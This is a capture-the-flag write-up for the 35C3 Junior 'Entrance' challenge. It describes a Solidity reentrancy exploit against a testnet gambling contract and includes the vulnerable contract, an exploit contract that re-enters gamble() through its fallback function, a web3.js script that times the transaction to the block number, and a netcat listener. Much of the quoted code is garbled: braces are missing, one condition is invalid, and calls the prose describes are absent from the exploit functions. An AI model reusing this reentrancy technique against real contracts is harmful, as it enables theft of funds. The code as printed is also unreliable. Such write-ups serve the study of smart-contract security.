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Link to challenge: > Of Course > Entrance.


This repository is the solution to the Junior 35C3CTF Entrance, a Solidity reentrancy attack. The expl0it is a simple recursion based on the statement contained in the vulnerable contract.

The Attack

Right from the get go, when looking at the contract code, one can see that there is a getFlag method in the vulnerable contract. To call it, a player needs a balance of >= 300.

  function getFlag(string memory _server, string memory _port) public {
    require (balances[msg.sender] > 300, "flag");
    emit EntranceFlag(_server, _port);

An event is emitted with a server and port string. Our initial assumption was that when the event is triggered by someone on the ropsten contract, a server from the CTF team is listening for these events and will send back the flag to a listening server the player has to setup.

But first, let's enter the game. To do that a player needs to call a method called enter(uint256 _pin) on the the entrance.sol contract. A pin is needed and wasn't specified in any of the hints. It's however easy to find in the data of the contract creation transaction.

  modifier legit(uint256 _pin) {
    if (_pin == pin, "bye") _;

  function enter(uint256 _pin) public legit(_pin) {
    balances[msg.sender] = 10;
    has_played[msg.sender] = false;

As we can call getFlag only with a balance of 300, we have to gamble with a function called gamble(). Unfortunately, this function only adds 10 to the player's balance and then doesn't allow the player to play again as has_played is then set to true.

  modifier onlyNewPlayer {
    require(has_played[msg.sender] == false, "hello");

  function gamble() public onlyNewPlayer {
    require (balances[msg.sender] >= 10, "gamble");
    if ((block.number).mod(7) == 0) {
      balances[msg.sender] = balances[msg.sender].add(10);
      balance = balances[msg.sender];
      // Tell the sender he won!"You won!");
      has_played[msg.sender] = true;
    } else {
      balances[msg.sender] = balances[msg.sender].sub(10);

We can also see that one can only successfully gamble when the block.number is divisible by 7, as otherwise funds are subtracted from the balance of the player.

With this in mind we were quite confused at first what to do and re-read the description of the challenge again:

Can you enter? Again?

So the question is: Can we enter gamble again. Turns out we can. In fact, if the function doesn't call a valid function, it defaults to a so called fallback-function that can be defined in a calling contract.

With knowing this, we made the following plan:

  • Create a smart contract that has a function enter that calls entrance.enter with the given pin 0xbc4f77
  • Check if the current block.number is divisible by 7 and if so call gamble
  • Define a fallback function in our exploit contract that checks if the balance is less than 300 and if so, call gamble again.

After a lot of back and forth and some quite fun but also frustrating hours, we arrived at the following code:

pragma solidity >=0.4.21 <0.6.0;

import "./entrance.sol";
import "./SafeMath.sol";

contract EnterAgain {
    using SafeMath for *;

    uint256 counter = 0;
    address a;

    constructor(address _a) {
        a = _a;

    function enter() {
        uint b = block.number;
        require((b).mod(7) == 0, "wrong block number");
        Entrance entrance = Entrance(a);
        entrance.getFlag("", "8080");

    function() {
        Entrance entrance = Entrance(a);
        if(entrance.balances(this) <= 300) {

In the constructor, we set the address a of the vulnerable contract. In enter, we call block.number and check if it's divisible by 7. We then instanciate the vulnerable contract, call enter and gamble. We run through the gambling game by continously falling back to our fallback-function function() to ultimately stop, and call getFlag. After the transaction is confirmed, our netcat server was answered with the flag.

Setting up the netcat server

We also need a TCP server listening somewhere from a public IP. That part was super simple, we just run:

$ nc -lk 8080

in a machine with a public IP and left it there, logging.

Running the exploit

After deploying the smart contract containing the exploit in the Ropsten network, we wrote a script in nodejs to trigger the execution of our exploit.

The script is in JavaScript and run on nodejs. It uses the web3.js library:

(async function pwn() {
  var privateKey = "...";
  var publicKey = "...";
  var wallet = new SimpleWallet(

  var contract = await wallet.loadContract('EnterAgain');
  var blockNumber = await wallet.web3.eth.getBlockNumber();
  console.log(blockNumber, blockNumber % 7);
  if (blockNumber % 7 !== 6) {
  await wallet.send(contract.methods.enter());

After initializing a provider, we load the EnterAgain contract that we compiled on our machine, and ask for the current block number modulo 7 is 6. Note that the only way win in the gamble method is when blockNumber % 7 === 0. When the EVM runs the smart contract, blockNumber evaluates to the block number that is currently being created. To run our exploit at a specific blockNumber, we can try to send the transaction at blockNumber - 1, and hope that the transaction will be included in the next block.

A note on estimateGas

We developed the exploit using a local ganache-cli node for testing. We spent several hours figuring out why our transaction failed, even if the logic was correct. It seems that ganache-cli doesn't give you a clear message if your transaction runs out of gas. After moving to Ropsten, we got a clear message: "gas required exceeds allowance or always failing transaction".

Note that we used as gasLimit the result of estimateGas. After the error on Ropsted, we decided to hardcode a large amount of gas (900000) and the transaction went through successfully.

    const rawTx = {
      from: this.address,
      to: method._parent.options.address,
      nonce: this.web3.utils.toHex(count),
      gasPrice: this.web3.utils.toHex(this.web3.utils.toWei("21", "gwei")),
      gasLimit: this.web3.utils.toHex(
        //await method.estimateGas({from: this.address}),
      data: data,

Basically, what estimateGas does is to take the transaction, execute it against the current state of the blockchain, measure the amount of gas used and return it. estimateGas is basically a dry run of the transaction, and it happens right before submitting the transaction to the network. We send our transaction when blockNumber % 7 === 6, so it can be executed when blockNumber % 7 === 0. Hence, estimateGas ran gamble on the wrong blockNumber without triggering the exploit, giving us a wrong estimation of the gas needed.


$ npm i
$ truffle migrate --network ropsten
$ node enter.js
# Run it until your transaction gets included into a block that is divisible by
# 7. Usually this is the case if the current block is divisible by 6.

We included several private keys here from a ropsten address. Potentially these have to be changed or refilled with ether to run the expl0it.


  • Modify all require statements with a second argument string to know where the contract reverts. Additionally, change all ifs to require with a second argument string so that you can debug them better.
  • Always debug locally with Ganache and Truffle. It's so much easier than deploying live. There is additionally truffle debug <tx id> which can be very helpful for debugging a transaction step by step.
  • If stuck, remove checks from the vulnerable contract to get your script passing. It will really accelerate your workflow.
  • Remember that the game can only be played once. So once you call gamble, you always have to re-deploy your contract.


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